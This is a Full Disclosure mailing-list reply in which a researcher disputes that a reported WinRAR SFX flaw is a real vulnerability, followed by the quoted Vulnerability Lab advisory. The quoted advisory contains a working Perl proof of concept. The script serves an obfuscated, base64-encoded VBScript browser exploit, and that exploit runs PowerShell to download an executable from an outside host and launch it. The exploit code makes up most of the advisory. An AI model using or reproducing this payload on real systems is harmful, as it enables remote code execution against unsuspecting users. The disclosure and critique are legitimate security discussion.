Re: WinRAR SFX v5.21 - Remote Code Execution Vulnerability

[Gynvael Coldwind <gynvael () coldwind pl>]

Correct me if I'm wrong, but the vulnerability can be summarized as: if you
run an untrusted .exe you might execute malicious code?

I hardly see this as giving anything new to the attacker who can just
create a malicious exe file, set the winrar sfx icon and send it to the
victim.

Keep in mind that not every unexpected behavior or software bug is a
security vulnerability.

(and no, potential AV bypass doesn't make it a vulnerability either)

Cheers,
Gynvael

On Mon, 28 Sep 2015 10:27 Vulnerability Lab <research () vulnerability-lab com>
wrote:

> Document Title:
> ===============
> WinRAR SFX v5.21 - Remote Code Execution Vulnerability
>
>
> References (Source):
> ====================
> http://www.vulnerability-lab.com/get_content.php?id=1608
>
> Video: https://www.youtube.com/watch?v=fo0l0oT4468
>
>
> Release Date:
> =============
> 2015-09-28
>
>
> Vulnerability Laboratory ID (VL-ID):
> ====================================
> 1608
>
>
> Common Vulnerability Scoring System:
> ====================================
> 9
>
>
> Product & Service Introduction:
> ===============================
> WinRAR with over 500 million users worldwide by far the most popular
> compression program and therefore the best way to files securely and
> efficiently to pack for a data transfer to speed up the data transfer via
> e-mail and secure storage optimized files.
>
> (Copy of the Homepage: http://www.win-rar.com/start.html )
>
>
> Abstract Advisory Information:
> ==============================
> An independent vulnerability laboratory researcher discovered a code
> execution vulnerability in the official WInRAR SFX v5.21 software.
>
>
> Vulnerability Disclosure Timeline:
> ==================================
> 2015-09-28:     Public Disclosure (Vulnerability Laboratory)
>
>
> Discovery Status:
> =================
> Published
>
>
> Exploitation Technique:
> =======================
> Remote
>
>
> Severity Level:
> ===============
> Critical
>
>
> Technical Details & Description:
> ================================
> A remote code execution vulnerability has been discovered in the official
> WInRAR SFX v5.21 software.
> The vulnerability allows remote attackers to unauthorized execute system
> specific code to comrpomise a target system.
>
> The issue is located in the `Text and Icon` function of the `Text to
> display in SFX window` module. Remote attackers are
> able to generate own compressed archives with maliciuous payloads to
> execute system specific codes for compromise. The attackers
> saved in the sfx archive input the malicious generated html code. Thus
> results in a system specific code execution when a target
> user or system is processing to open the comprossed archive.
>
> The security risk of the code execution vulnerability is estimated as
> critical with a cvss (common vulnerability scoring system) count of 9.2.
> Exploitation of the code execution vulnerability requires low user
> interaction (open file) without privilege system or restricted user
> accounts.
> Successful exploitation of the remote code execution vulnerability in the
> WinRAR SFX software results in system, network or device compromise.
>
>
> Proof of Concept (PoC):
> =======================
> The code execution vulnerability can be exploited by remote attackers
> without privilege system user account or user interaction.
> For security demonstration or to reproduce the vulnerability follow the
> provided information and steps below to continue.
>
> Manual steps to reproduce the vulnerability ...
> 1.      Run perl code : perl poc.pl
> 2.      Right Click on any file and select "add to archive..."
> 3.      Select "Create SFX archive"
> 4.      Go to the Advanced Menu and select "SFX options..."
> 5.      Go to the "Text and icon" Menu
> 6.      Copy this perl output (HTML) and past on "Text to display in SFX
> window"
> 7.      Click OK -- OK
> 8.      Your SFX file Created
> 9.      Just open sfx file
> 10.     Your Link Download/Execute on your target
> 11.     Successful reproduce of the code execution vulnerability!
>
>
> PoC: Exploit Code
> #!/usr/bin/perl
> # Title : WinRaR SFX - Remote Code Execution
> # Affected Versions: All Version
> # Tested on Windows 7 / Server 2008
> #
> # Author: Mohammad Reza Espargham
> # Linkedin: https://ir.linkedin.com/in/rezasp
> # E-Mail: me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
> # Website: www.reza.es
> # Twitter: https://twitter.com/rezesp
> # FaceBook: https://www.facebook.com/reza.espargham
> #
> # ID: MS14-064
>
> use strict;
> use warnings;
> use IO::Socket;
> use MIME::Base64 qw( decode_base64 );
> use Socket 'inet_ntoa';
> use Sys::Hostname 'hostname';
>
> print "    Mohammad Reza Espargham\n\n";
> my $ip = inet_ntoa(scalar gethostbyname(hostname() || 'localhost'));
>
> my $port = 80;
>
> print "Winrar HTML Code\n".'<html><head><title>poc</title><META
> http-equiv="refresh" content="0;URL=http://&apos; . $ip .
> '"></head></html>'."\n\n" if($port==80);
> print "Winrar HTML Code\n".'<html><head><title>poc</title><META
> http-equiv="refresh" content="0;URL=http://&apos; . $ip . ':' . $port .
> '"></head></html>'."\n\n" if($port!=80);
>
> my $server = new IO::Socket::INET(  Proto => 'tcp',
> LocalPort => $port,
> Listen => SOMAXCONN,
> ReuseAddr => 1)
> or die "Unable to create server socket";
>
> # Server loop
> while(my $client = $server->accept())
> {
>     my $client_info;
>     while(<$client>)
>     {
>         last if /^\r\n$/;
>         $client_info .= $_;
>     }
>     incoming($client, $client_info);
> }
>
> sub incoming
> {
>     print "\n=== Incoming Request:\n";
>     my $client = shift;
>     print $client &buildResponse($client, shift);
>     close($client);
> }
>
> sub buildResponse
> {
>     my $client = shift;
>     my $client_info = shift;
>
>     my
> $poc="CjxodG1sPgo8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVt
>
> dWxhdGVJRTgiID4KPGhlYWQ+CjwvaGVhZD4KPGJvZHk+CiAKPFNDUklQVCBMQU5HVUFHRT0iVkJT
>
> Y3JpcHQiPgoKZnVuY3Rpb24gcnVubXVtYWEoKSAKT24gRXJyb3IgUmVzdW1lIE5leHQKc2V0IHNo
>
> ZWxsPWNyZWF0ZW9iamVjdCgiU2hlbGwuQXBwbGljYXRpb24iKQpjb21tYW5kPSJJbnZva2UtRXhw
>
> cmVzc2lvbiAkKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgn
>
> aHR0cDovL3RoZS5lYXJ0aC5saS9+c2d0YXRoYW0vcHV0dHkvbGF0ZXN0L3g4Ni9wdXR0eS5leGUn
>
> LCdsb2FkLmV4ZScpOyQoTmV3LU9iamVjdCAtY29tIFNoZWxsLkFwcGxpY2F0aW9uKS5TaGVsbEV4
>
> ZWN1dGUoJ2xvYWQuZXhlJyk7IgpzaGVsbC5TaGVsbEV4ZWN1dGUgInBvd2Vyc2hlbGwuZXhlIiwg
>
> Ii1Db21tYW5kICIgJiBjb21tYW5kLCAiIiwgInJ1bmFzIiwgMAplbmQgZnVuY3Rpb24KPC9zY3Jp
>
> cHQ+CiAKPFNDUklQVCBMQU5HVUFHRT0iVkJTY3JpcHQiPgogIApkaW0gICBhYSgpCmRpbSAgIGFi
>
> KCkKZGltICAgYTAKZGltICAgYTEKZGltICAgYTIKZGltICAgYTMKZGltICAgd2luOXgKZGltICAg
>
> aW50VmVyc2lvbgpkaW0gICBybmRhCmRpbSAgIGZ1bmNsYXNzCmRpbSAgIG15YXJyYXkKIApCZWdp
>
> bigpCiAKZnVuY3Rpb24gQmVnaW4oKQogIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgaW5mbz1OYXZp
>
> Z2F0b3IuVXNlckFnZW50CiAKICBpZihpbnN0cihpbmZvLCJXaW42NCIpPjApICAgdGhlbgogICAg
>
> IGV4aXQgICBmdW5jdGlvbgogIGVuZCBpZgogCiAgaWYgKGluc3RyKGluZm8sIk1TSUUiKT4wKSAg
>
> IHRoZW4gCiAgICAgICAgICAgICBpbnRWZXJzaW9uID0gQ0ludChNaWQoaW5mbywgSW5TdHIoaW5m
>
> bywgIk1TSUUiKSArIDUsIDIpKSAgIAogIGVsc2UKICAgICBleGl0ICAgZnVuY3Rpb24gIAogICAg
>
> ICAgICAgICAgIAogIGVuZCBpZgogCiAgd2luOXg9MAogCiAgQmVnaW5Jbml0KCkKICBJZiBDcmVh
>
> dGUoKT1UcnVlIFRoZW4KICAgICBteWFycmF5PSAgICAgICAgY2hydygwMSkmY2hydygyMTc2KSZj
>
> aHJ3KDAxKSZjaHJ3KDAwKSZjaHJ3KDAwKSZjaHJ3KDAwKSZjaHJ3KDAwKSZjaHJ3KDAwKQogICAg
>
> IG15YXJyYXk9bXlhcnJheSZjaHJ3KDAwKSZjaHJ3KDMyNzY3KSZjaHJ3KDAwKSZjaHJ3KDApCiAK
>
> ICAgICBpZihpbnRWZXJzaW9uPDQpIHRoZW4KICAgICAgICAgZG9jdW1lbnQud3JpdGUoIjxicj4g
>
> SUUiKQogICAgICAgICBkb2N1bWVudC53cml0ZShpbnRWZXJzaW9uKQogICAgICAgICBydW5zaGVs
>
> bGNvZGUoKSAgICAgICAgICAgICAgICAgICAgCiAgICAgZWxzZSAgCiAgICAgICAgICBzZXRub3Rz
>
> YWZlbW9kZSgpCiAgICAgZW5kIGlmCiAgZW5kIGlmCmVuZCBmdW5jdGlvbgogCmZ1bmN0aW9uIEJl
>
> Z2luSW5pdCgpCiAgIFJhbmRvbWl6ZSgpCiAgIHJlZGltIGFhKDUpCiAgIHJlZGltIGFiKDUpCiAg
>
> IGEwPTEzKzE3KnJuZCg2KQogICBhMz03KzMqcm5kKDUpCmVuZCBmdW5jdGlvbgogCmZ1bmN0aW9u
>
> IENyZWF0ZSgpCiAgT24gRXJyb3IgUmVzdW1lIE5leHQKICBkaW0gaQogIENyZWF0ZT1GYWxzZQog
>
> IEZvciBpID0gMCBUbyA0MDAKICAgIElmIE92ZXIoKT1UcnVlIFRoZW4KICAgICAgIENyZWF0ZT1U
>
> cnVlCiAgICAgICBFeGl0IEZvcgogICAgRW5kIElmIAogIE5leHQKZW5kIGZ1bmN0aW9uCiAKc3Vi
>
> IHRlc3RhYSgpCmVuZCBzdWIKIApmdW5jdGlvbiBteWRhdGEoKQogICAgT24gRXJyb3IgUmVzdW1l
>
> IE5leHQKICAgICBpPXRlc3RhYQogICAgIGk9bnVsbAogICAgIHJlZGltICBQcmVzZXJ2ZSBhYShh
>
> MikgIAogICAKICAgICBhYigwKT0wCiAgICAgYWEoYTEpPWkKICAgICBhYigwKT02LjM2NTk4NzM3
>
> NDM3ODAxRS0zMTQKIAogICAgIGFhKGExKzIpPW15YXJyYXkKICAgICBhYigyKT0xLjc0MDg4NTM0
>
> NzMxMzI0RS0zMTAgIAogICAgIG15ZGF0YT1hYShhMSkKICAgICByZWRpbSAgUHJlc2VydmUgYWEo
>
> YTApICAKZW5kIGZ1bmN0aW9uIAogCiAKZnVuY3Rpb24gc2V0bm90c2FmZW1vZGUoKQogICAgT24g
>
> RXJyb3IgUmVzdW1lIE5leHQKICAgIGk9bXlkYXRhKCkgIAogICAgaT1ydW0oaSs4KQogICAgaT1y
>
> dW0oaSsxNikKICAgIGo9cnVtKGkrJmgxMzQpICAKICAgIGZvciBrPTAgdG8gJmg2MCBzdGVwIDQK
>
> ICAgICAgICBqPXJ1bShpKyZoMTIwK2spCiAgICAgICAgaWYoaj0xNCkgdGhlbgogICAgICAgICAg
>
> ICAgIGo9MCAgICAgICAgICAKICAgICAgICAgICAgICByZWRpbSAgUHJlc2VydmUgYWEoYTIpICAg
>
> ICAgICAgICAgIAogICAgIGFhKGExKzIpKGkrJmgxMWMrayk9YWIoNCkKICAgICAgICAgICAgICBy
>
> ZWRpbSAgUHJlc2VydmUgYWEoYTApICAKIAogICAgIGo9MCAKICAgICAgICAgICAgICBqPXJ1bShp
>
> KyZoMTIwK2spICAgCiAgICAgICAgICAKICAgICAgICAgICAgICAgRXhpdCBmb3IKICAgICAgICAg
>
> ICBlbmQgaWYKIAogICAgbmV4dCAKICAgIGFiKDIpPTEuNjk3NTk2NjMzMTY3NDdFLTMxMwogICAg
>
> cnVubXVtYWEoKSAKZW5kIGZ1bmN0aW9uCiAKZnVuY3Rpb24gT3ZlcigpCiAgICBPbiBFcnJvciBS
>
> ZXN1bWUgTmV4dAogICAgZGltIHR5cGUxLHR5cGUyLHR5cGUzCiAgICBPdmVyPUZhbHNlCiAgICBh
>
> MD1hMCthMwogICAgYTE9YTArMgogICAgYTI9YTArJmg4MDAwMDAwCiAgIAogICAgcmVkaW0gIFBy
>
> ZXNlcnZlIGFhKGEwKSAKICAgIHJlZGltICAgYWIoYTApICAgICAKICAgCiAgICByZWRpbSAgUHJl
>
> c2VydmUgYWEoYTIpCiAgIAogICAgdHlwZTE9MQogICAgYWIoMCk9MS4xMjM0NTY3ODkwMTIzNDU2
>
> Nzg5MDEyMzQ1Njc4OTAKICAgIGFhKGEwKT0xMAogICAgICAgICAgIAogICAgSWYoSXNPYmplY3Qo
>
> YWEoYTEtMSkpID0gRmFsc2UpIFRoZW4KICAgICAgIGlmKGludFZlcnNpb248NCkgdGhlbgogICAg
>
> ICAgICAgIG1lbT1jaW50KGEwKzEpKjE2ICAgICAgICAgICAgIAogICAgICAgICAgIGo9dmFydHlw
>
> ZShhYShhMS0xKSkKICAgICAgICAgICBpZigoaj1tZW0rNCkgb3IgKGoqOD1tZW0rOCkpIHRoZW4K
>
> ICAgICAgICAgICAgICBpZih2YXJ0eXBlKGFhKGExLTEpKTw+MCkgIFRoZW4gICAgCiAgICAgICAg
>
> ICAgICAgICAgSWYoSXNPYmplY3QoYWEoYTEpKSA9IEZhbHNlICkgVGhlbiAgICAgICAgICAgICAK
>
> ICAgICAgICAgICAgICAgICAgIHR5cGUxPVZhclR5cGUoYWEoYTEpKQogICAgICAgICAgICAgICAg
>
> IGVuZCBpZiAgICAgICAgICAgICAgIAogICAgICAgICAgICAgIGVuZCBpZgogICAgICAgICAgIGVs
>
> c2UKICAgICAgICAgICAgIHJlZGltICBQcmVzZXJ2ZSBhYShhMCkKICAgICAgICAgICAgIGV4aXQg
>
> IGZ1bmN0aW9uCiAKICAgICAgICAgICBlbmQgaWYgCiAgICAgICAgZWxzZQogICAgICAgICAgIGlm
>
> KHZhcnR5cGUoYWEoYTEtMSkpPD4wKSAgVGhlbiAgICAKICAgICAgICAgICAgICBJZihJc09iamVj
>
> dChhYShhMSkpID0gRmFsc2UgKSBUaGVuCiAgICAgICAgICAgICAgICAgIHR5cGUxPVZhclR5cGUo
>
> YWEoYTEpKQogICAgICAgICAgICAgIGVuZCBpZiAgICAgICAgICAgICAgIAogICAgICAgICAgICBl
>
> bmQgaWYKICAgICAgICBlbmQgaWYKICAgIGVuZCBpZgogICAgICAgICAgICAgICAKICAgICAKICAg
>
> IElmKHR5cGUxPSZoMmY2NikgVGhlbiAgICAgICAgIAogICAgICAgICAgT3Zlcj1UcnVlICAgICAg
>
> CiAgICBFbmQgSWYgIAogICAgSWYodHlwZTE9JmhCOUFEKSBUaGVuCiAgICAgICAgICBPdmVyPVRy
>
> dWUKICAgICAgICAgIHdpbjl4PTEKICAgIEVuZCBJZiAgCiAKICAgIHJlZGltICBQcmVzZXJ2ZSBh
>
> YShhMCkgICAgICAgICAgCiAgICAgICAgIAplbmQgZnVuY3Rpb24KIApmdW5jdGlvbiBydW0oYWRk
>
> KSAKICAgIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgICByZWRpbSAgUHJlc2VydmUgYWEoYTIpICAK
>
> ICAgCiAgICBhYigwKT0wICAgCiAgICBhYShhMSk9YWRkKzQgICAgIAogICAgYWIoMCk9MS42OTc1
>
> OTY2MzMxNjc0N0UtMzEzICAgICAgIAogICAgcnVtPWxlbmIoYWEoYTEpKSAgCiAgICAKICAgIGFi
>
> KDApPTAKICAgIHJlZGltICBQcmVzZXJ2ZSBhYShhMCkKZW5kIGZ1bmN0aW9uCiAKPC9zY3JpcHQ+
>     CiAKPC9ib2R5Pgo8L2h0bWw+";
>     $poc = decode_base64($poc);
>
>     my $r = "HTTP/1.0 200 OK\r\nContent-type: text/html\r\n\r\n
>     $poc";
>     return $r;
> }
>
>
> Security Risk:
> ==============
> The security risk of the code execution vulnerability in the winrar sfx
> software is estimated as high. (CVSS 7.4)
>
>
> Credits & Authors:
> ==================
> Mohammad Reza Espargham [https://ir.linkedin.com/in/rezasp] (me () reza es
> or reza.espargham () gmail com] (www.reza.es)
>
>
> Disclaimer & Information:
> =========================
> The information provided in this advisory is provided as it is without any
> warranty. Vulnerability Lab disclaims all warranties, either expressed
> or implied, including the warranties of merchantability and capability for
> a particular purpose. Vulnerability-Lab or its suppliers are not liable
> in any case of damage, including direct, indirect, incidental,
> consequential loss of business profits or special damages, even if
> Vulnerability-Lab
> or its suppliers have been advised of the possibility of such damages.
> Some states do not allow the exclusion or limitation of liability for
> consequential or incidental damages so the foregoing limitation may not
> apply. We do not approve or encourage anybody to break any vendor licenses,
> policies, deface websites, hack into databases or trade with fraud/stolen
> material.
>
> Domains:    www.vulnerability-lab.com           - www.vuln-lab.com
>                               - www.evolution-sec.com
> Contact:    admin () vulnerability-lab com         -
> research () vulnerability-lab com                        -
> admin () evolution-sec com
> Section:    magazine.vulnerability-db.com       -
> vulnerability-lab.com/contact.php                     -
> evolution-sec.com/contact
> Social:     twitter.com/#!/vuln_lab             -
> facebook.com/VulnerabilityLab                         -
> youtube.com/user/vulnerability0lab
> Feeds:      vulnerability-lab.com/rss/rss.php   -
> vulnerability-lab.com/rss/rss_upcoming.php            -
> vulnerability-lab.com/rss/rss_news.php
> Programs:   vulnerability-lab.com/submit.php    -
> vulnerability-lab.com/list-of-bug-bounty-programs.php -
> vulnerability-lab.com/register/
>
> Any modified copy or reproduction, including partially usages, of this
> file requires authorization from Vulnerability Laboratory. Permission to
> electronically redistribute this alert in its unmodified form is granted.
> All other rights, including the use of other media, are reserved by
> Vulnerability-Lab Research Team or its suppliers. All pictures, texts,
> advisories, source code, videos and other information on this website
> is trademark of vulnerability-lab team & the specific authors or managers.
> To record, list (feed), modify, use or edit our material contact
> (admin () vulnerability-lab com or research () vulnerability-lab com) to get a
> permission.
>
>                                 Copyright © 2015 | Vulnerability
> Laboratory - [Evolution Security GmbH]™
>
>
>
> --
> VULNERABILITY LABORATORY - RESEARCH TEAM
> SERVICE: www.vulnerability-lab.com
> CONTACT: research () vulnerability-lab com
> PGP KEY:
> http://www.vulnerability-lab.com/keys/admin () vulnerability-lab com%280x198E9928%29.txt
>
>
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/